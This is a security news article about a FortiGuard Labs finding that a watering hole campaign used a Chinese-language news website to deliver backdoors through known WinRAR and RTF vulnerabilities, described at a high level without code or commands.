A new malware campaign has counted a Chinese news website among its victims and has used the legitimate domain to spread backdoors to the PCs of innocent readers.
FortiGuard Labs said on Wednesday that the campaign, targeted at Chinese language speakers, is using a watering hole strategy as its infection vector.
Watering hole attacks occur after an attacker has probed a website and tested its defenses to find weaknesses. The target domain is then infected -- potentially through a vulnerability or through phishing an operator -- and malicious scripts are loaded onto the website in order to spring a malware trap.
Browsers connecting to the website will also be checked for vulnerabilities, or malware packages may be directly downloaded, awaiting execution by the unwitting visitor. Other attacks, such as malvertising or card skimming, are also possible.
The campaign has been active since at least 2017. One of its latest victims, the Chinese news website, is hosted in the United States and provides content for Chinese citizens living overseas.
FortiGuard Labs says the infection "appears to be experimental because it uses so many different techniques and tools to target this end-user community."
Phishing links have been injected into the domain, including a fake Twitter login page and malicious scripts which check the browser and OS information of visitors to make sure they are using a Microsoft Windows system.
The attackers make use of known WinRAR and RTF file vulnerabilities. The security flaws, tracked as CVE-2018-20250 and CVE-2017-11882, are exploited to deliver a backdoor. If a system is vulnerable, the WinRAR flaw is used to hide an .ace file as .rar, and another file -- conf.exe -- is then extracted and assigned to startup.
Conf.exe contains Sality, a trojan that dynamically loads a malicious DLL and is able to harvest and sent stolen system data to the attacker's command-and-control (C2) server. In addition, the malware is able to collect screenshots, create file lists, launch reverse shells, download files, and grab clipboard text and MD5 hashes, among other functions.
RC4 encryption and a hardcoded encryption key are used to encrypt and decrypt information sent to the C2 by the malware.
However, it does seem the developers failed to finish off their exploit, given that conf.exe is only extracted when the username 'test' is in play.
The RTF flaw is used to deploy a fake .doc file -- which is actually a .rtf file -- which triggers the Microsoft Equation Editor, runs regsvr32.exe, and downloads an additional payload called 123.sct.
This malicious script then downloads a backdoor that contains the same functionality as Sality.
"We found this backdoor malware always uses a Chinese-native software name to lure a victim to execute it," the researchers say. "The latest sample is uploaded with the name "XLAccount.dll" [...] a known module belonging to Xunlei Game Box, a web game platform developed by Xunlei. It [also] has an interesting new functionality to collect information of a VPN tool, called "Shadowsocks," which is used in China for going over the Great Firewall of China."
FortiGuard Labs says that at the time of public disclosure, the malicious script is still operating in the Chinese news website.
"While we analyzed [the malware's] functionalities and C2 connections in this blog, it is still under active development and adding new functionalities to improve its ability to steal more information and data," the team added.
Previous and related coverage
- New 'warshipping' technique gives hackers access to enterprise offices
- MegaCortex ransomware slams enterprise firms with $5.8 million blackmail demands
- LokiBot malware now hides its source code in image files
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0